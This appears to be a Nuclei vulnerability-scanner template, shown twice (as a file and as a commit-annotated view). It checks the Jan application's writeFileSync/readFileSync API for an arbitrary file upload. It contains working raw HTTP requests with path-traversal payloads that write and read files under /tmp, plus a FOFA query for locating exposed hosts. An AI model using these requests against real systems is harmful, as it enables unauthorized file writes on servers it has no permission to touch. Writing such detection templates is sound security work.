nuclei-templates/http/vulnerabilities/other/jan-file-upload.yaml

id: jan-file-upload

info:
  name: Jan - Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.
  reference:
    - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
    - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md
  metadata:
    fofa-query: icon_hash="-165268926"
    max-request: 2
  tags: jan,intrusive,file-upload

variables:
  string: "{{to_lower(rand_base(5))}}"

http:
  - raw:
      - |
        POST /v1/app/writeFileSync HTTP/1.1
        Host: {{Hostname}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["/../../../../../tmp/{{string}}.txt","{{randstr}}"]

      - |
        POST /v1/app/readFileSync HTTP/1.1
        Host: {{Hostname}}
        contentType: application/json
        Content-Type: text/plain;charset=UTF-8
        Origin: {{RootURL}}

        ["file:/../../../../../tmp/{{string}}.txt","utf-8"]

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{string}}'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950
Update and rename jan-api-lfi.yaml to jan-file-upload.yaml 2024-07-18 10:07:03 +00:00			`id: jan-file-upload`
Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00
			`info:`
Update and rename jan-api-lfi.yaml to jan-file-upload.yaml 2024-07-18 10:07:03 +00:00			`name: Jan - Arbitrary File Upload`
Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00			`author: pussycat0x`
			`severity: high`
			`description: \|`
			`Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability.`
			`reference:`
			`- https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md`
			`- https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md`
			`metadata:`
			`fofa-query: icon_hash="-165268926"`
			`max-request: 2`
Update and rename jan-api-lfi.yaml to jan-file-upload.yaml 2024-07-18 10:07:03 +00:00			`tags: jan,intrusive,file-upload`

Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00			`variables:`
Update and rename jan-api-lfi.yaml to jan-file-upload.yaml 2024-07-18 10:07:03 +00:00			`string: "{{to_lower(rand_base(5))}}"`
Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00
			`http:`
			`- raw:`
			`- \|`
Update jan-file-upload.yaml 2024-07-23 07:08:56 +00:00			`POST /v1/app/writeFileSync HTTP/1.1`
Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00			`Host: {{Hostname}}`
			`contentType: application/json`
Update jan-file-upload.yaml 2024-07-23 07:08:56 +00:00			`Content-Type: text/plain;charset=UTF-8`
Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00			`Origin: {{RootURL}}`

Update and rename jan-api-lfi.yaml to jan-file-upload.yaml 2024-07-18 10:07:03 +00:00			`["/../../../../../tmp/{{string}}.txt","{{randstr}}"]`

Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00			`- \|`
			`POST /v1/app/readFileSync HTTP/1.1`
			`Host: {{Hostname}}`
			`contentType: application/json`
			`Content-Type: text/plain;charset=UTF-8`
			`Origin: {{RootURL}}`

Update and rename jan-api-lfi.yaml to jan-file-upload.yaml 2024-07-18 10:07:03 +00:00			`["file:/../../../../../tmp/{{string}}.txt","utf-8"]`
Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
Update and rename jan-api-lfi.yaml to jan-file-upload.yaml 2024-07-18 10:07:03 +00:00			`- '{{string}}'`
Create jan-api-lfi.yaml 2024-07-18 07:34:30 +00:00
			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Jul 23 07:22:41 UTC 2024] :robot: 2024-07-23 07:22:41 +00:00			`# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950`